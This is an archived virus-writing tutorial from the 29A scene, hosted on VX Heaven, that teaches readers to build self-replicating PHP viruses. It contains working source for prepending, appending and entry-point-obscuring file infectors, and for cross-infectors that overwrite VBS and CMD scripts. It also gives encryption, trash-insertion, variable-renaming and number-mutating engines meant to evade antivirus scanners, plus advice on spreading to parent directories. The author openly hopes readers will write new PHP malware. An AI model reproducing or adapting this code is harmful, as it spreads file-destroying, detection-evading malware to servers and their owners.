Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

PHP Virus Writing Guide

SPTH
29a [7]
October 2003

[Back to index] [Comments]

Index

  1. Intro Words
  2. File infection
    1. Prepending
    2. Appending
    3. Cross Infection
      1. VBS infection
      2. JS infection
      3. CMD infection
    4. Entry Point Obscuring
      1. Include the virus after a command
      2. Useing a function of the victim
  3. Encryption
    1. Changing virus to ASCII
    2. Useing an intern decryption function
    3. Useing changed character string
  4. Polymorphism
    1. Adding Trash
    2. Change Variable Names
    3. Number Changing
  5. Other Thoughts
    1. Find more files
    2. Changing the commands
  6. Last Words

0) Intro Words

PHP, abbreviate: 'Hypertext Preprocessor', is a very common script language for the world-wide-web. You're possible to do nearly everthing internet related with that language. That means, you're also able to make viruses for it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done in October 2000, and was released in 29A#5. It was no real virus, moreover a companion. It writes to every PHP-file in the current directory a line, which let the victim run the virus. But the host doesn't contain the virus. After searching something about PHP viruses I found out that there is no high-tech PHP virus so far out, because all the virus I could find are rips of PHP.Pirus (useing the same prinzip). That was my inspiration in writing such an article. I wanted to make something totally new, and I guess I had success. I tested every source with PHP 4.3.3, and everthing worked fine. Now go on reading this and learn something about PHP viruses! :)

1) File Infection

That's maybe the most important thing, when you want to make a PHP virus, therefor I want to explain you, how you can infect files with PHP. It should be no problme to understand the examples, because I tried it to make as simple as possible. When the article was written (autumn 2003), there was no real file infector out there. The only interesting PHP virus so far is MaskBits' PHP.Pirus, which don't infect files, but use the command 'include' that the virus is executed in every PHP file in the current dir. You may think 'Why does he tell me this?". I don't know, just for fun :). Now let me explain you how to infect files.

a) Prepending

A prepender copies it's code infront of the victim's code, therefor it will be executed before the victim. That's the main idea of this kind of infection. But there are some other important things you have to note: To get the virus out of the file, you need any information about where the virus is. In my example the virus uses the first 391 bytes. Next important thing is, that you must not infect a file two times. What do to against that? Check, if the file if already infected. In the following example the virus searchs in the first 13 bytes (in an infected file it's this code: '<?php // SPTH') if there's a 'SPTH'. If yes, the file won't be infected. OK, I think, you understood. Now let's look at the PHP Prepender Virus example:

PHP Prepender Virus Example

<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.'); 
while ($file = readdir($curdir)) 
{ 
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    if (!strstr(fread($victim, 13), 'SPTH'))
    {
      rewind($victim);
      fwrite($victim, $string.fread($victim, filesize($file)););
    }
    fclose($victim);
  } 
}
closedir($curdir);
?>

As this is a real easy virus, you should understand it quickly while looking at it. Now i'm going to give you the most important things the example does:

b) Appending

An Appender is a virus, which copies itself after the victim file. It's really easy to make one. You just have to search the last php-part (or just make a infection-mark at the begin of the virus. Then you read till the end, and you have your virus-file. The rest should clear: Search a victim, check if not infected and copy the virus-body in the end of the file. I made an exaple for that, as you migth think. The exact explanation will be in the end after the code.

PHP Appender Virus Example

<?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');
$curdir=opendir('.');
while ($file = readdir($curdir)) 
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    if (!strstr(fread($victim, filesize($file)), 'SPTH'))
    {
      fwrite($victim, $string);
    }
    fclose($victim);
  } 
}
closedir($curdir); 
?>

I've already explained how the prinzip works. Now I'll explain you my example:

c) Cross Infection

Cross Infection means infecting more than one file extansion. That's really useful, because the virus will spread much faster. That was my inspiration in writing this. I found some nice ways how to infect other file-formats, therefor I want to show you them. The biggest problem while coding these things was, that you can't execute a .php file directly, but with an Internet Browser. Fortunatly Microsoft make it possible to open the Internet Explorer very easiely. :)

i) VBS infection

It's really easy to infect a vbs-file, because the only important thing if you want to write such a cross infector is, that you don't have to use the sign [" = chr(34) ], because VisualBasicScript uses it for strings, and since our whole code is a string in the VBS-file, there would be an error. Now look at the example, and try to understand (shouldn be too difficult, because I made it very easy to read).

Cross Infector - VBS

<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=WScript.CreateObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);
$vbscode.='set shell=WScript.CreateObject('.chr(34).'WScript.Shell'.chr(34).')'.chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);
while ($string && $string!='?>')
{
  $vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
  $string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory)) 
{ 
  if (strstr($file, '.vbs'))
  {
    fwrite(fopen($file, 'w'), $vbscode);
  }
}
closedir($directory);
?>

It should be totally easy to understand this example. Anyway, I'll give you the main ideas of the little code:

ii) JS infection

Infecting a JavaScript file is nearly the same as infecting a VBS file, therefore I won't give you an example. The reason for this is, that we're using WScript in VBS and JS. The only thing you have to do is to change the 'set' to 'var', and the '.vbs' to '.js', but i guess, you know that :D. I tried it, and it worked fine.

iii) CMD infection

This was the most difficult file extansion, which I made for this article. The reason is easy to explain: CMD = Batch for WinNT/00/XP = DOS. And as you know you are NOT allowed to use any '>', '<' or '&' in a DOS-string. But I solved the problem, as you may imagine ;). I used the characters in every string instead of the read signs. Than I had 2 more problems: The begin and the end of the PHP code, where we MUST write '<' or '>'. So I thougth about that, and suddenly a idea came to my mind: I'll use a JavaScript file, to write the first and the last line to the .htm file. And since I have to use a script anyway for starting the Internet Explorer (to run the PHP-code - DOS can't open a Internet Browser), I used that file. The result of my coding is the following file :D. I'll explain the main-ideas more exactly after the source.

Cross Infector - BAT

<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).[email protected] off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
  $cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);
  $string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=WScript.CreateObject("Scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=WScript.CreateObject("WScript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';

$directory=opendir('.');
while ($file = readdir($directory))
{ 
  if (strstr($file, '.cmd'))
  {
    fwrite(fopen($file, 'w'), $cmdcode);
  }
}
closedir($directory);
?>

Now the shourt explanation of the code:

d) Entry Point Obscuring

This is a really important technique in virus-writing. Maybe some of you don't know, what EPO exactly is. So I'll explain you: An AV-program searchs in most cases at some static offsets for the virus (maybe at the begin or at the begin). To fake them, we have to use a variable adress of the virus, and don't use any jump or call to the virus at a static adress. How could we do this? I'll show you a short 'grafic'. At this point I want to thank SnakeByte for his Perl-EPO article [released in 29a#6] for the idea, how to make a EPO virus in a script language. So, here is the grafic:

        [ part of the victim file ]
        information about the address
        read xxx lines of the virus
        open PHP file
            read yyy lines
            insert the virus
            read rest
        close PHP file
        [ rest of the victim file ]

Now we have another problem: Where to include the virus-code in the host-file? SnakeByte did it searching for ';', which is the end of a Perl command. As you meigth know, also PHP statments ends with a ';'. Than I thought about an other way, which could be also done, since that technique could be destruction of the victim-file. Than i got an idea: including the code to an function. how i exactly mean this, I'll show you after the ';'-example.

i) Include the virus after a command

As I already told you, this idea comes from SnakeByte. To include a virus after a command, you have to search for a ';', which is the end of every PHP statement. That seems to be everything. Now let's have a look at the example for this EPO technique.

EPO virus - Type I

<?php
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 987);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir)) 
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    $vicont=fread($victim, filesize($file));
    if (!strstr($vicont, 'SPTH'))
    {
      $possible=0; $c=0;
      while($c<filesize($file))
      {
        if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $possible++;}
        $c++;
      }
      $which=rand(1,$possible); $c=0; $i=0;
      while($which)
      {
        if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $which--; }
        $c++;
      }
      rewind($victim);
      $a=fread($victim, $c); $b=fread($victim, filesize($file));
      fclose($victim);
      fwrite(fopen($file, 'w'), $a.chr(13).chr(10).'$ln='.$c.';'.chr(13).chr(10).$content.chr(13).chr(10).$b);
    }
  }
}
?>

This is an example for the EPO technique, which I descript above. It's quite easy to understand, anyway, I'll tell you how the virus works exactly:

ii) Using a function of the victim

This technique is maybe little bit better than the other one. But in fact I've seen this type of EPO in any script virus (ok, I haven't seen really many EPO script viruses :D). I've already told you, that the virus will use a function by the host file. But maybe you don't really understand, what I mean, therefore I'll show you, what I mean. Here you can see a non-infected file and an infected file. Hope that help you to get the point of the idea:

            Normal File:                   Infected File:
            _________________________      _________________________
           |       HOST-CODE-1       |    |        HOST-CODE-1      |
           |    call to function()   |    |    call to function()   |
           |       HOST-CODE-2       |    |        HOST-CODE-2      |
           |        function()       |    |        function()       |
           |       HOST CODE-3       |    |      < < VIRUS > >      |
           |     end  function       |    |   call to real funtion  |
           |       HOST-CODE-4       |    |      end  function      |
           |_________________________|    |        HOST-CODE-4      |
                                          |      real function      |
                                          |        HOST CODE-3      |
                                          |     end real function   |
                                          |_________________________|

Now you should understand, what I mean, but how to manage this? First you have to search for every function in the code than you use on of them, save the victim's function code and copy the virus code to the function. After the virus code you need a call to a real function, which you can add in the end of the file. The name of the real function is no problem, since your code call it. Now I also made an exaple for this technique, as you may imagine. Look at it, and try to understand. The techniqual description will follow after the code:

EPO virus - Type II

<?php
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 1611);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir)) 
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    $vicont=fread($victim, filesize($file));
    if (!strstr($vicont, 'SPTH'))
    {
      $possible=0; $viccont=$vicont;
      while(strstr($viccont, 'function '))
      {
        $viccont=strstr($viccont, 'unction ');
	$possible++; 
      }
      $which=rand(1,$possible);
      $viccont=$vicont;
      while($which--)
      {
        $viccont=strstr($viccont, 'function ');
      }
      $viccont=strstr($viccont, '{');
      $before=strlen($vicont)-strlen($viccont)+1; $check=0; $i=0;
      do
      {
        if ($viccont{$i}=='{') { $check++; }
	if ($viccont{$i++}=='}') { $check--; }
      }
      while($check);
      fseek($victim, $before);
      $funccont=fread($victim, $i+1);
      fseek($victim, $before+$i-1);
      $aftercont=fread($victim, filesize($file)-$before-$i-strlen(strstr($vicont, '?>')));
      $coundj=0; $newvar='';
      do
      {
        $newvar.=chr(rand(97,122)); $countj++;
      } 
      while ($countj<rand(5,15));
      rewind($victim);
      $beforecont=fread($victim, $before);
      rewind($victim);
      fwrite($victim, $beforecont.chr(13).chr(10).'$ln='.($before+strlen($before)+9).';'.chr(13).chr(10).$content.chr(13).chr(10).$newvar.'(); }'.$aftercont.chr(13).chr(10).'function '.$newvar.'() {'.chr(13).chr(10).$funccont.'?'.'>');
    }
  }
}
?>

To understand this code, you must not be a beginner. :) I worked about 4-5h at this little thing. Anyway, it works really fine and I want to tell you, how it works:

2) Encryption

The first part of the article should give you the idea, how to write a successful virus in PHP. But more or less, these techniques are easy to detect for Anti-Virus companies. Therefore I also want to show you, how to fake them. This (and of corse the next part: Polymorphism) of the article should help you to write a PHP virus, which can not be detected by simple string scan or just to decrease scanstrings. I found many different kinds to crypt a PHP string, and of corse, I want to tell them to you :)

a) Changing virus to ASCII

Using the whole virus into characters should not be a big problem. To execute the code in character I thought about 'eval()'. But after 2h of testing I saw that it don't work. So I had to think of another way: Include the virus-code (written in ASCII) to a new file, run the file via 'include()', and delete it. Therefor I made an example, which shows, how you may use the technique:

Encryption Example - Type I

<?php
$content=chr(60).chr(63).chr(112).chr(104).chr(112).chr(13).chr(10).chr(112).chr(114).chr(105).
         chr(110).chr(116).chr(40).chr(34).chr(72).chr(105).chr(32).chr(86).chr(88).chr(101).
         chr(114).chr(33).chr(32).chr(84).chr(104).chr(105).chr(115).chr(32).chr(105).chr(115).
         chr(32).chr(106).chr(117).chr(115).chr(116).chr(32).chr(97).chr(32).chr(115).chr(105).
         chr(108).chr(108).chr(121).chr(32).chr(116).chr(101).chr(115).chr(116).chr(32).chr(115).
         chr(116).chr(114).chr(105).chr(110).chr(103).chr(32).chr(102).chr(111).chr(114).chr(32).
         chr(116).chr(104).chr(101).chr(32).chr(101).chr(110).chr(99).chr(114).chr(121).chr(112).
         chr(116).chr(105).chr(111).chr(110).chr(32).chr(105).chr(110).chr(32).chr(80).chr(72).
         chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).chr(10).chr(63).chr(62);
copy(__FILE__,'file.php');
$a=fopen('file.php','w+');
fwrite($a, $content);
fclose($a);
include('file.php');
unlink('file.php');
?>

You should understand the prinzip of the code really fast. The encrypt code contains a 'secret' message. :) I'll show you, how it works, if you haven't understand it so far:

b) Useing an intern decryption function

This head-line sounds strange. Well, it isn't :). The basic of the idea is this one: You call a function with 3 values, and get the right sign back. The idea isn't hard to understand. I used the same prinzip as at the last example. The only differents is the encryption: Now I use a function-call instead of a real sign. But because the function calculates the right sign, and returns it, it's no problem. I hope, that you understand it. Now let's have a look at my example for this techique:

Encryption Example - Type II

<?php
$content=cr(-177,237,1).cr(169,106,2).cr(-135,247,1).cr(150,46,2).cr(8624,77,3).cr(56,43,2).
         cr(1900,190,3).cr(127,15,2).cr(20,94,1).cr(51,54,1).cr(110,0,2).cr(372,256,2).
         cr(247,207,2).cr(57,18,2).cr(-1,84,1).cr(322,221,2).cr(147,48,2).cr(232,121,2).
         cr(7700,70,3).cr(-33,133,1).cr(-31,63,1).cr(180,97,2).cr(-106,207,1).cr(-148,247,1).
         cr(184,70,2).cr(322,221,2).cr(-48,164,1).cr(167,135,2).cr(-71,148,1).cr(24947,247,3).
         cr(10810,94,3).cr(202,87,2).cr(4559,47,3).cr(261,158,2).cr(312,211,2).cr(-79,111,1).
         cr(-3,61,1).cr(-5,73,1).cr(2262,58,3).cr(56,15,2).cr(-145,204,1).cr(3289,253,3).
         cr(225,215,2).cr(21,42,1).cr(302,240,2);
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');

function cr($a,$b,$c)
{
  if ($c==1) { return(chr($a+$b)); }
  if ($c==2) { return(chr($a-$b)); }
  if ($c==3) { return(chr($a/$b)); }
}
?>

Well, you should have understand what I meant, when you looked at the code. I'll show you, what it does exacly. The encrypt code is a secret message again :)

c) Useing changed character string

This technique is a well-known one in script languages. For instands jackie did it in JavaScript. Therefore I thought that it should also be able make it in PHP. And as you can see, it was able. The technique works as follow: The (virus-) code is encrypt in a variable. It's encrypt via adding 3 (the key) to the ASCII of every character. Should be easy to understand. Now let's look at the example I made:

Encryption Example - Type III

<?php
$all='?Bskssulqw+*111frro/#wklv#lv#wkh#wklug#hqfu|swlrq#whfkqltxh#dqg#|rx#duh#vwloo#zlwk#ph111#=,*,>BA';
$i=0; $content='';
while($i<strlen($all)) { $content.=chr(ord($all{$i++})-3); }
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');
?>

The encrypt variable-content contains the code of a PHP file writing a message to the screen. The rest works as always: Makeing a new file, and overwrite them with the decrypt code, execute the file, and delete it. How the en/decryption works I'll show you:

3) Polymorphism

As everybody knows, this is one of the most important techniques to fake AVs and to show, that you know, what you're doing :). So I desided also to write something about this technique here. In fact, I've never seen any other poly PHP virus around the world (maybe it exists anyway). It was really easy for me to write some poly-engines, because PHP isn't a really difficult language. I tried my best to show you, how a PHP poly engine could work.

a) Adding Trash

This technique is a well-known in many script languages. Therefor I tought, it should also be possible in PHP. Then I sat down, and began to write. About 2h later (with smoking-breaks, sure :D), I had the finished code. First I want to tell you, what kind of trash/junk/garbage I included in my example:

Well, now we know, what to include. Anything else to do? Sure, we have to delete the trash again, oterhwise the file would have 2MB after the 10th time you run it, and I think, you don't want that. :) So, how to delete trash? In my example I searched the first letter of a line, and checked, if it's a '/' or a $'. If yes, it's trash and we don't have to include it to our new code. It seems I explained everthing. Now let's have a look at the code:

Adding Trash example

<?php
 $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
 $newcont='<?php'.chr(13).chr(10);
srand((double)microtime()*1000000);
while ($string && $string!='?>') {
  if(rand(0,1)) {
    if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
    if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.chr(13).chr(10); }
    if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }
  }
  $string=strtok(chr(13).chr(10));
  if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }
  fwrite(fopen(__FILE__, 'w'),$newcont);
}

function trash($var) {
  do { $var.=chr(rand(97,122)); } while (rand(0,7));
  return $var;
}
?>

Everthing should be clear now, anyway, I'll tell you the most important things in this code-snip:

b) Variable Changing

This is another well-known script technique to morph the virus. So I did it again in PHP. Let's explain the technique. You're useing many varibles in a virus, and if the variables have the same name every generation, our friends the AV-guys are able to use this fact to detect the virus. So it could be of much value to change the variable-names. How I did it? I used an array with all my varibale, which i'm using. Than I searched for every value from the array in the virus-file (=i searched for every variable), and replaced it via the command 'str_replace' and used a new one, which got by my 'trash-function'. Now let's look at the source of the example:

Variable changing example

<?php
$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash');
srand((double)microtime()*1000000);
$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
$counti=0;
while($changevars[$counti]) {
  $content=str_replace($changevars[++$counti], trash('',0), $content);
}
fwrite(fopen(__FILE__,'w'),$content);

function trash($newvar, $countj) {
  do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));
  return $newvar;
}
?>

Easy code, easy to understand. Anyway, let me tell you, how it exactly works:

c) Number Changing

Every code contains any numbers, whatever this number does. After thinking a little bit I found out, that I can change the numbers too. So I desited to make a PHP code, which changes the numbers in it's code. How can we change a number, you may think. It's really easy: You make a calculation with that number, which returns the number you want. Let's have a look at the possible variants:

I also tried to use div, but there are comma-numbers, which don't really work. But it's no problem, there are enought variants with just 3 calculation types. Now I'll show you, how a number could be after the 4th morphing:

10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))

Now I hope, that you know about the damn cool results of this technique :) After explaining the main-thing, I'll show you the little code, who changes the numbers.

Number Changing example

<?php
$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));
srand((double)microtime()*1000000);
$count=-1; $number='';
while(++$count<strlen($newcont)) {
  if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {
    $number=$newcont{$count};
    while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$newcont{$count}; }
    $remn=rand(1,10);
    switch(rand(1,3)) {
      case 1:
        $cont.='('.($number-$remn).'+'.$remn.')'; break;
      case 2:
        $cont.='('.($number+$remn).'-'.$remn.')'; break;
      case 3:
        $cont.='('.($number*$remn).'/'.$remn.')'; break;
    }
  }
  $cont.=$newcont{$count};
  $number='';
}
fwrite(fopen(__FILE__,'w'),$cont);
?>

Now a shourt explanation about the code:

4) Other thoughts

When I wrote this article, some other ideas came to my mind, therefore I also what to give the ideas to you. Maybe that some of the ideas are just non-sense or other are brilliant (I don't think so, but wonder happens :D ). OK, let's start: This part contains ideas for better hideing to don't become detected, or how to spread faster. I hope, you also like to read this!

a) Find more files

What must we do if we want to find more files? Search in more directories. :) My idea is this one: Since the command 'getcwd()' returns the current dir, we are able to infect also every root-directory. How to do this? Look at the return-value of 'getcwd()':

E:\SPTH\Programme\minixampp\htdocs

Now we have 4 directories, which aren't infected so far:

          ~~ E:\SPTH\Programme\minixampp
          ~~ E:\SPTH\Programme
          ~~ E:\SPTH
          ~~ E:\

And how to get the directories? Just searchs for a '\' in the current dir, than delete character by character, till you have a '\'. Than you have the directory-name. The rest is easy: Open it via 'opendir()', and do the same as I tried to explain you :)

b) Changing the commands

Maybe you already know it, but PHP contains tons of aliases for different commands and we can use that. I'm sure you know how :) Just replace one command with another, which is doing the same. I made a list of commands and it's aliases, to show you, how much we are able to change. This is just a short list, nevertheless it could be useful, when you want to make such a polymorphism virus.

         chop                   -     rtrim()
         close                  -     closedir()
         die                    -     exit()
         dir                    -     getdir()
         doubleval              -     floatval()
         fputs                  -     fwrite()
         ini_alter              -     ini_set()
         is_double              -     is_float()
         is_integer             -     is_int()
         is_long                -     is_int()
         is_real                -     is_float()
         is_writeable           -     is_writable()
         join                   -     implode()
         magic_quotes_runtime   -     set_magic_quotes_runtime() 
         pos                    -     current()
         rewind                 -     rewinddir()
         show_source            -     highlight_file()
         sizeof                 -     count()
         strchr                 -     strstr()

Get the full list of aliases here: http://zend.com/phpfunc/all_aliases.php

5) Last Words

Comming to an end I want to say that I had really much fun while discovering this language, and I also hope, that you learned some things. I hope, that I will see many new and good PHP maleware in near future. If I don't see any, I know, that I worked 2-3 month for nothing. :) But let's see it positiv: Now it's easy to write strong viruses for this language, because the techniques are already discovered. Here at this point I want to thank MaskBits/VXI for making the first PHP maleware called PHP.Pirus, which were released in 29a#5. This inspired me in writing this article, because I found out, that the current PHP viruses are not at the point where you can say: "It's perfect, we can't make it better." :). Another guy I want to thank is SnakeByte, because of his articles about Perl poly/EPO/encryption in 29a#6. It helped me in some parts of this article. Greets goes also to Kefi, who wrote also a PHP-polymorphic virus, which I haven't seen so far. The fact that I know that made me very activ in writing this article :). Now I want to send some greets and thanks out to the world, because I think that I said everything, what is important:

PhileT0aster and the rest of the rRlf-gang ;), jackie for being something like an idol for me, SlageHammer & Knowdeth - the most friendly VX guys i know :), VirusBuster - for answering my stupid questions every time, Vorgon - for trying to teach me assembler :D, Toro - for helping me with many problems, SnakeByte for the great tutorials you wrote, SAD1c - for beeing a great guy, VorteX & Worf for being the first guys who helped in the VX-world :), VxF & Metal for the great fun in IRC :), Doctor Rave for some great ideas you gave me, prizzy for the nice email you wrote, herm1t for hosting my homepage, sinocred for hateing the '<SPTH> hi' :D, PanoiX for being a cool guy :), Arzy for being very helpful :D, Necronomikon & Gigabyte for cool talks in IRC (unfortunatly we have nearly no contact recently) and many other cool individuals I know... :) I also want to send out some group greets: Greets to rRlf (of course :D), 29A, iKx, SLAM, TKT, MIONS, Whackerz and every other more or less activ virus-writing-group!

                                                        - - - - - - - - - - - - - - -
                                                          Second Part To Hell/[rRlf]  
                                                          www.spth.de.vu
                                                          [email protected]
                                                          written from oct-november 2003
                                                          Austria
                                                        - - - - - - - - - - - - - - - 
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua